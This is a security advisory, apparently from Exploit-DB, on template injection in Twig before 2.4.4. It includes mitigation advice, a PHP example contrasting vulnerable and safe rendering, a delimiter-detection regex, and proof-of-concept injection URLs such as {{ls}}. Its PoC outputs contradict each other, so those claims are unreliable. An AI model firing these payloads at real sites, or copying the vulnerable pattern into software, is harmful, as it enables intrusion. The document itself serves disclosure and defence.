Vendor: Twig
By: JameelNabbo
CVSS: 7.5 (HIGH)
Type: Server side template injection
CWE: SSTI-94
Product Name: Twig
Affected Version From: Version < 2.4.4
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: MAC OSX
Year: 2018

Twig <2.4.4 Server side template injection

Twig <2.4.4 contains a server side template injection (SSTI) vulnerability: when an application places a request parameter into a template, an attacker can supply a Twig expression in {{COMMAND TO EXECUTE}} syntax instead of the expected integer or string value, and the template engine evaluates it, allowing arbitrary command execution. Whether the flaw is reachable depends on the application and on which parameters it accepts via GET or POST.

Mitigation:

Update Twig to version 2.4.4 or later to patch the vulnerability. Additionally, validate and sanitize user-supplied input before it reaches the template engine to prevent template injection attacks.
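As an added illustration, not part of the original advisory or of Twig's own code, the application-side pattern that lets a request parameter reach the template engine as code, beside its safe form, plus the input check the mitigation above calls for. It assumes a hypothetical search page using Twig 2.x through the legacy Twig_Environment / Twig_Loader_Array class names.

```php
<?php
// Added example (not from the advisory): assumes Twig 2.x installed via
// Composer and a hypothetical /search page that reads ?search_key=...
require_once __DIR__ . '/vendor/autoload.php';

$loader = new Twig_Loader_Array([
    // A fixed template: user data arrives only through the context variable.
    'search.html' => 'Results for {{ search_key }}',
]);
// Autoescaping enabled explicitly so context values are HTML-escaped.
$twig = new Twig_Environment($loader, ['autoescape' => 'html']);

$searchKey = $_GET['search_key'] ?? '';

// VULNERABLE: the request value is concatenated into the template *source*,
// so a value written in {{ ... }} syntax is parsed and evaluated by Twig
// instead of being displayed as text.
function renderUnsafe(Twig_Environment $twig, string $searchKey): string
{
    $template = $twig->createTemplate('Results for ' . $searchKey);
    return $template->render([]);
}

// SAFE: the template is fixed and the request value is passed as data.
// Twig treats it as an opaque string, escapes it, and shows it literally.
function renderSafe(Twig_Environment $twig, string $searchKey): string
{
    return $twig->render('search.html', ['search_key' => $searchKey]);
}

// Defense in depth only: rejecting Twig delimiters in input is a useful
// check and a log signal, but it is not a substitute for renderSafe().
function looksLikeTemplateInjection(string $value): bool
{
    return (bool) preg_match('/\{\{|\{%|\{#/', $value);
}

if (looksLikeTemplateInjection($searchKey)) {
    error_log('Rejected search_key containing template delimiters');
    http_response_code(400);
    exit('Invalid search term');
}
echo renderSafe($twig, $searchKey);
```

The same delimiter check (including the URL-encoded form %7B%7B) is a reasonable pattern to alert on in web server access logs when hunting for probes of this kind.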

Exploit-DB raw data:

Vulnerability details:
# Exploit Title: Twig <2.4.4 Server side template injection 
# Date: 02/15/2018
# Exploit Author: JameelNabbo
# Author website: www.jameelnabbo.com
# Vendor Homepage: https://twig.symfony.com 
# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
# Version: < 2.4.4
# Tested on: MAC OSX

1. Description:
Twig is a modern PHP template engine which compiles templates down to plain optimized PHP code. Twig <2.4.4 contains an SSTI vulnerability which allows attackers to execute commands within the parameters, by just using {{COMMAND TO EXECUTE}} instead of the expected values (a normal integer or normal string), depending on the vulnerable application, which takes different params by GET or POST.

Example: by injecting this in a search param: http://localhost/search?search_key={{4*4}}    Output: 16


2. POC:
http://localhost/search?search_key={{4*4}} 
OUTPUT: 4 

http://localhost/search?search_key={{ls}} 
OUTPUT: list of files/directories etc….